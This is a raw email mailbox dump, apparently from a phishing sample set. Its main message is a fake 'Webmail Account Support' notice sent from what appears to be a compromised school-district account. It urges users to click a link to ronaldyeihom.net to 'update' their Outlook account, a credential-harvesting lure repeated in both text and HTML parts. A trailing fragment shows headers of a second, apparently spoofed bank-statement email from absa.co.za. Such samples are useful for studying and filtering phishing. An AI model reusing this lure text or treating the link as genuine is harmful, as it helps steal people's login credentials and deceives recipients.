From: "Osment, Kimberly A" <Kimberly.Osment@spartanburg2.k12.sc.us>
To: "Osment, Kimberly A" <Kimberly.Osment@spartanburg2.k12.sc.us>
Subject: RE: Ticket: Daily Bulletin !!
Thread-Topic: Ticket: Daily Bulletin !!
Thread-Index: AdPMEndPyMR3H8ZMS/yhP/hjjdSCBAAAsPEZAABAumAAABOBqw==
Date: Wed, 4 Apr 2018 13:14:39 +0000
Message-ID: <CEB2B8329225FE45BCBC35B77BA1C96C89EBC73D@EXCHANGE1.district2.com>
References: <CEB2B8329225FE45BCBC35B77BA1C96C89EB7EEC@EXCHANGE1.district2.com>
In-Reply-To: <CEB2B8329225FE45BCBC35B77BA1C96C89EB7EEC@EXCHANGE1.district2.com>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
x-originating-ip: [195.181.164.168]
Content-Type: multipart/alternative;
	boundary="_000_CEB2B8329225FE45BCBC35B77BA1C96C89EBC73DEXCHANGE1distri_"
MIME-Version: 1.0
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 459

--_000_CEB2B8329225FE45BCBC35B77BA1C96C89EBC73DEXCHANGE1distri_
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






WEBMAIL ACCOUNT SUPPORT

  With the  strengthening off our security system and improving your mailin=
g experience, We have detected your mail server is out of date. To enhance =
computer system security and compliance with the federal audit requirements=
 . All Sever Users are to update their account , kindly click  on webmail <=
https://ronaldyeihom.net/.well-known/nn/> to update your account to the lat=
est Outlook Web Apps experience. login to the Exchange outlook

NB: All current  server user is advise to complete the directive above imme=
diately.
___________________
Sincerely,
Help Desk Support Team
















































--_000_CEB2B8329225FE45BCBC35B77BA1C96C89EBC73DEXCHANGE1distri_
Content-Type: text/html; charset="iso-8859-1"
Content-ID: <6A509C899DA43347B7AF277E2477951D@spartanburg2.k12.sc.us>
Content-Transfer-Encoding: quoted-printable

<html dir=3D"ltr">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859-=
1">
<style>P {
	MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px
}
</style><style id=3D"owaParaStyle">P {
	MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px
}
</style>
</head>
<body ocsi=3D"0" fPStyle=3D"1">
<div style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Tahoma; COLOR: #000000; DIRECTI=
ON: ltr">
<p>&nbsp;</p>
<div id=3D"divRpF811822" style=3D"DIRECTION: ltr"><font color=3D"#000000" s=
ize=3D"2" face=3D"Tahoma"><br>
</font><br>
&nbsp;</div>
<div></div>
<div>
<div style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Tahoma; COLOR: #000000; DIRECTI=
ON: ltr">
<p style=3D"FONT-SIZE: 16px; MARGIN-BOTTOM: 0px; FONT-FAMILY: calibri,arial=
,helvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; MARGIN-TOP: =
0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT-STY=
LE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px=
">
<font color=3D"#20124d"><span style=3D"FONT-SIZE: small; FONT-FAMILY: &quot=
;times new roman&quot;,sans-serif"><u><b>WEBMAIL ACCOUNT SUPPORT</b></u></s=
pan></font></p>
<p style=3D"FONT-SIZE: 16px; MARGIN-BOTTOM: 0px; FONT-FAMILY: calibri,arial=
,helvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; MARGIN-TOP: =
0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT-STY=
LE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px=
">
<font color=3D"#20124d"><span style=3D"FONT-SIZE: small; FONT-FAMILY: &quot=
;times new roman&quot;,sans-serif"><strong><u></u></strong></span><br>
</font><font color=3D"#20124d"><font size=3D"2" face=3D"Times New Roman, sa=
ns-serif"><span style=3D"LINE-HEIGHT: 19px">&nbsp; With the &nbsp;</span></=
font><span style=3D"FONT-SIZE: small; FONT-FAMILY: &quot;times new roman&qu=
ot;,sans-serif; LINE-HEIGHT: 19px">strengthening off our security
 system and improving your mailing experience, We have detected your mail s=
erver&nbsp;is out of date. To enhance computer system security and complian=
ce&nbsp;with the federal audit requirements .&nbsp;All Sever Users are to u=
pdate their account , kindly click&nbsp; on<span>&nbsp;</span><b></b><a id=
=3D"LPlnk370542" class=3D"OWAAutoLink" href=3D"https://ronaldyeihom.net/.we=
ll-known/nn/" target=3D"_blank"><b>webmail</b>&nbsp;</a></span><span style=
=3D"FONT-SIZE: small; FONT-FAMILY: &quot;times new roman&quot;,sans-serif; =
LINE-HEIGHT: 19px">to
 update your account to the latest Outlook Web Apps experience. login to th=
e Exchange outlook &nbsp;</span></font></p>
<div style=3D"FONT-SIZE: 16px; FONT-FAMILY: calibri,arial,helvetica,sans-se=
rif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEI=
GHT: 400; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; =
LETTER-SPACING: normal; TEXT-INDENT: 0px" dir=3D"ltr">
<div><font color=3D"#20124d"><span style=3D"FONT-SIZE: small; FONT-FAMILY: =
&quot;times new roman&quot;,sans-serif; LINE-HEIGHT: 19px"><br>
</span></font></div>
<div><font color=3D"#20124d" size=3D"2" face=3D"Times New Roman, sans-serif=
"><span style=3D"LINE-HEIGHT: 19px">
<div style=3D"MARGIN: 0px"><font size=3D"2" face=3D"Calibri,sans-serif"><sp=
an style=3D"FONT-SIZE: 11pt"><font size=3D"2" face=3D"inherit"><span style=
=3D"FONT-SIZE: 10pt">NB: All current&nbsp; server user is advise to complet=
e the directive above&nbsp;immediately.<br>
</span></font></span></font></div>
</span></font></div>
<div><font color=3D"#20124d" size=3D"2" face=3D"Times New Roman, sans-serif=
"><span style=3D"LINE-HEIGHT: 19px">___________________</span></font></div>
<div><font color=3D"#20124d" size=3D"2" face=3D"Times New Roman, sans-serif=
"><span style=3D"LINE-HEIGHT: 19px">Sincerely,</span></font></div>
<div><font color=3D"#20124d" size=3D"2" face=3D"Times New Roman, sans-serif=
"><span style=3D"LINE-HEIGHT: 19px">
<div style=3D"MARGIN: 0px"><font size=3D"2" face=3D"Calibri,sans-serif"><sp=
an style=3D"FONT-SIZE: 11pt"><font size=3D"2" face=3D"inherit"><span style=
=3D"FONT-SIZE: 10pt">Help Desk Support Team</span></font></span></font></di=
v>
<div style=3D"MARGIN: 0px"><font size=3D"2" face=3D"Calibri,sans-serif"><sp=
an style=3D"FONT-SIZE: 11pt"><font size=3D"2" face=3D"inherit"><span style=
=3D"FONT-SIZE: 10pt"><br>
</span></font></span></font></div>
<br>
</span></font></div>
<div><span style=3D"FONT-SIZE: small; FONT-FAMILY: &quot;times new roman&qu=
ot;,sans-serif; LINE-HEIGHT: 19px"><font color=3D"#20124d"></font></span>&n=
bsp;</div>
</div>
<p><br class=3D"Apple-interchange-newline">
&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
</div>
</div>
</div>
</body>
</html>

--_000_CEB2B8329225FE45BCBC35B77BA1C96C89EBC73DEXCHANGE1distri_--

From jose@monkey.org Wed Apr 11 04:57:42 2018 +0000
Return-Path: official@absa.co.za
Delivered-To: jose@monkey.org
X-FDA: 74041713522.21.stem46_603028a319c18
X-Spam-Summary: 20,1.5,0,c75b24e794c9ff72,d41d8cd98f00b204,official@absa.co.za,:official@absa.co.za,RULES_HIT:41:72:379:677:800:871:962:967:973:978:979:981:983:988:989:1189:1208:1254:1256:1260:1263:1313:1314:1381:1394:1395:1431:1432:1433:1434:1436:1437:1516:1517:1518:1545:1546:1549:1550:1552:1571:1575:1588:1592:1594:1685:1710:1730:1764:1777:1792:1801:2194:2198:2199:2200:2525:2539:2553:2559:2568:2610:2682:2685:2693:2741:2859:2890:2892:2894:2909:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3167:3353:3362:3619:3865:3866:3867:3868:3870:3871:3872:3873:3874:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4383:4605:4700:5007:6119:6227:6261:6354:6669:6748:7211:7212:7213:7281:7398:7514:7809:7875:7903:8516:8568:8599:8603:8660:8829:8957:9025:9072:9121:9149:9164:9388:9402:9901:10009:10049:10128:10265:10346:10394:10881:11026:11233:11473:11604:11651:11658:11914:12043:12217:12295:12438:12517:12519:12555:12903:12963:12986:13110:13132:13139:13148:13230:1
X-HE-Tag: stem46_603028a319c18
X-Filterd-Recvd-Size: 101399
Received: from mail.acueductopopayan.com.co (unknown [190.5.195.106])
	by imf26.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 11 Apr 2018 04:57:40 +0000 (UTC)
Received: from JFSP1.JFSP.local (unknown [164.39.231.89])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(Client did not present a certificate)
	by mail.acueductopopayan.com.co (Postfix) with ESMTPSA id 542C1E5A0E;
	Tue, 10 Apr 2018 18:06:50 -0500 (COT)
Content-Type: multipart/mixed; boundary="===============0569441177=="
MIME-Version: 1.0
Subject: Cheque Account Statement 180410
To: you <official@absa.co.za>
